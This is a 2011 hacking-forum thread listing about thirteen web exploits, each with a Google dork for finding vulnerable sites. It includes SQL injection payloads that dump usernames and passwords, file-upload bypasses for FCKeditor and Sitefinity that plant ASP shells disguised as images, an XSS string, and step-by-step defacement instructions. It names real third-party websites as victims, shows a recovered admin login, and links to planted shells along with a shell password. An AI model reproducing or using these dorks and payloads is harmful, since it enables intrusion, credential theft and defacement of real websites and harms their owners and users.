satria | Date: Friday, 2011-08-05, 8:30 AM | Message # 1 |
Lieutenant colonel
Group: Administrators
Messages: 126
Status: Offline
Exploit:
-----------------------------------------
1. Remote Exploit
========================================
...
dork : spaw2/dialogs/ and spaw2/uploads/files/
========================================
Once you have found a site, apply the exploit:
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
-----------------------------------------
2. Remote File Upload Opencart
========================================
dork : Powered By OpenCart site:com
========================================
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Then change Connector: from ASP to PHP
-----------------------------------------
========================================
3. dork : com_joomradio
========================================
Exploit : /index.php?option=com_joomradio&page=show_radio&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user( ),user(),user(),user() FROM jos_users--
example : http://www.bces-india.com/index.p....%20user (),concat(username,0x3a,password),user(),user(%20),user(),user(),user()%20FROM%20jos_users--
-----------------------------------------
========================================
4. inurl:/forums.asp?iFor=
Then paste it into Google
========================================
Then pick one of your targets, for example:
http://www.portugalweb.net/forum/forums.asp?iFor=23
Delete the number after the = so that it becomes this:
http://www.portugalweb.net/forum/forums.asp?iFor=
After the =, enter the SQL injection:
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
The text listed under the heading 10 TOPICS is the username.
The text listed under the heading DATED is the password.
Look for the admin username and its password.
OK.. on the target site used for this tutorial I found a username & password.
Username : admin
Password : default
Now click the login link at the top.
There.. the login has succeeded.
Now, if you want to deface, click "POST NEW TOPICS".
Fill in the Subject... Example : HACKED BY BLA BLA BLA
Then put your HTML deface script into the field below the subject, and click Post !!!
-----------------------------------------
satria | Date: Friday, 2011-08-05, 8:32 AM | Message # 2 |
5. Upload a shell on "sitefinity [asp.net]"
dork : "Sitefinity:Login"
Prepare your ASP shell with the name : shell.asp;.gif
exploit: http://[localhost]/sitefin....og.aspx
Example victim.. hopefully it isn't dead yet: http://www.unitedexperts.co.uk/sitefin....og.aspx
Once that's done, choose "select" and then "upload this image".
When the upload has finished.. look at the top right for text like "view original size", and the shell will open..
demo: http://www.nsinursingsolutions.com/Images/cmd.asp;.gif
If you can't upload HTML for the deface, just do it like this: http://[localhost]/Images/ho1onk.asp;.jpg
6.http://www.blog.linux-mania.net/archives/30 -->Joomla
7. dork : inurl:"default_Image.asp"
EXPLOITS: http://[localhost]/imageLibrary/admin/images/default_Image.asp
ex: http://www.access2asp.com/imageL....age.asp
The shell: http://www.access2asp.com/dotnetdemo/admin/images/cmd.asp;.gif
8.inurl : /portals/0/
exploit: /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Then choose File ( A File On Your Site ).
Enter the code: replace the URL in the browser with javascript:__doPostBack('ctlURL$cmdUpload','')
After that, browse to your shell and then select it.
ex: http://solterra-connect.com//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
This one has a shell: http://solterra-connect.com/Portals/0/system.asp;.jpg pass:sohai
9.inurl:/tiny_mce/plugins/filemanager/ intitle:"index of"
exploit: editor/filemanager/files/ho1onk/test.html
ex: http://tvkomarno.sk/ becomes: http://tvkomarno.sk/editor/filemanager/default.htm
10. dork : inurl:"/wiki/run.php" powered By PWP
/wiki/run.php
11. XSS
inurl:/gen_confirm.php?errmsg=
result: http://www.balticsmarket.com/gen_confirm.php?errmsg=sohai was here<\cente-r><\h-1>
12.Exploit Zoopeer <-------http://hacker-newbie.org/showthread.php?tid=7523
dork : "Powered By Zoopeer"
Exploit : fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector
ex: http://www.kaian.ir/ becomes http://www.kaian.ir/....or.php
result: http://www.kaian.ir/images/File/system.html http://www.kaian.ir/images/File/Yukihina.html
13. Jumping, sohai style
http://fathaz.net/wp-content/themes/tomatoes/